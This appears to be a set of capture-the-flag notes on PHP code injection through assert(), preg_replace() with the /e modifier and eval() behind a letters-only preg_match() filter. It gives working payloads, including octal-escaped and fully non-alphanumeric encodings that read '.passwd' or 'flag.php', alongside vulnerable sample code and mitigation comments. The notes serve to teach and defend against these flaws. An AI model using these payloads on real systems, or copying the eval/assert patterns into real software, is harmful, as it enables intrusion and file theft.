# assert() evaluates a string argument as PHP code (string assertions were deprecated in PHP 7.2 and removed in PHP 8.0)
# Example from a challenge
?page=..
Warning: assert(): Assertion "strpos('includes/...php', '..') === false" failed in path/index.php on line 8
# The request looks like this
# Vulnerable pattern: the request parameter is concatenated into a string that assert() then evaluates as PHP,
# so the quoted string can be closed early and further expressions appended to the assertion.
# Mitigation: validate the page name against an allow-list (e.g. in_array($page, $allowed, true)) and never
# build code, or an assert() string, from request data.
assert("strpos('includes/' . $_GET['page'] . '.php', '..') === false")# If we inject this
?page=salade.php','..') || print('tomate') || strpos('oignons
# The request will look like
assert("strpos('/includes/salade.php','..') || print('tomate') || strpos('oignons.php','..') ===false")# Then, to exploit
?page=salade.php','..') || show_source('.passwd') || strpos('oignons
PHP preg_replace()
# In PHP, regular expressions need delimiters
preg_match("recherche","contenu");# wrong: no delimiters
preg_match("/recherche/","contenu");# OK
# preg_replace() with the "e" modifier runs the replacement string as PHP code for each match.
# The modifier was deprecated in PHP 5.5 and removed in PHP 7.0, where it is rejected as an unknown modifier.
# Use preg_replace_callback() instead, and never let request data reach the pattern or the replacement argument.
preg_replace("input1search","input2replace","input3content");
# With /e the second argument (the replacement) is what gets evaluated, as in the examples below:
preg_replace("/a/e","print(123)","abcd");
preg_replace("/a/e","print_r(scandir('.'))","abcd");
preg_replace("/a/e","file_get_contents('flag.php')","abcd");
PHP preg_match()
# It is possible to bypass some preg_match()-based filters by injecting only non-alphanumeric characters
# If the application then passes the user input to eval(), the payload is still executed
# Application code
# The filter only rejects letters and backticks; digits, quotes, backslashes and parentheses pass through,
# so a double-quoted string built from escape sequences still reaches eval() and is decoded there.
# Mitigation: never pass request data to eval(); with an allow-list of accepted values the regex becomes unnecessary.
if(!preg_match('/[a-zA-Z`]/',$_POST['input'])){print'<fieldset><legend>Result</legend>';eval('print '.$_POST['input'].";");print'</fieldset>';}# Exploitation and Bypass
# You can encode the payload as octal escape sequences inside a double-quoted string
file_get_contents(".passwd") becomes "\146\151\154\145\137\147\145\164\137\143\157\156\164\145\156\164\163"("\056\160\141\163\163\167\144")
# You can also use only non-alphanumeric characters (https://github.com/v1ll41n/Und3rCov3r)
echo -n "phpinfo();" > tmp.php
php Und3rCov3r.ph1 tmp.php
# It will create an alphax.php file containing the encoded payload
$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$______________=+_;$______++;$_______++;$_______++;$________++;$________++;$________++;$_________++;$_________++;$_________++;$_________++;$__________++;$__________++;$__________++;$__________++;$__________++;$___________++;$___________++;$___________++;$___________++;$___________++;$___________++;$____________++;$____________++;$____________++;$____________++;$____________++;$____________++;$____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$__('$_="'.$___.$______.$___________.$______________.$___.$______.$__________.$______________.$___.$______.$___________.$______________.$___.$______.$__________.$______.$___.$______.$__________.$___________.$___.$______.$_________.$___________.$___.$______.$__________.$____________.$___.$__________.$______________.$___.$__________.$______.$___.$____________.$________.'"');$__($_);# You can then for example read file
→readfile(".passwd");$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$______________=+_;$______++;$_______++;$_______++;$________++;$________++;$________++;$_________++;$_________++;$_________++;$_________++;$__________++;$__________++;$__________++;$__________++;$__________++;$___________++;$___________++;$___________++;$___________++;$___________++;$___________++;$____________++;$____________++;$____________++;$____________++;$____________++;$____________++;$____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$__('$_="'.$___.$______.$___________.$_______.$___.$______.$_________.$__________.$___.$______.$_________.$______.$___.$______.$_________.$_________.$___.$______.$_________.$___________.$___.$______.$__________.$______.$___.$______.$__________.$_________.$___.$______.$_________.$__________.$___.$__________.$______________.$___.$_________.$_______.$___.$__________.$___________.$___.$______.$___________.$______________.$___.$______.$_________.$______.$___.$______.$___________.$________.$___.$______.$___________.$________.$___.$______.$___________.$____________.$___.$______.$_________.$_________.$___.$_________.$_______.$___.$__________.$______.$___.$____________.$________.'"');$__($_);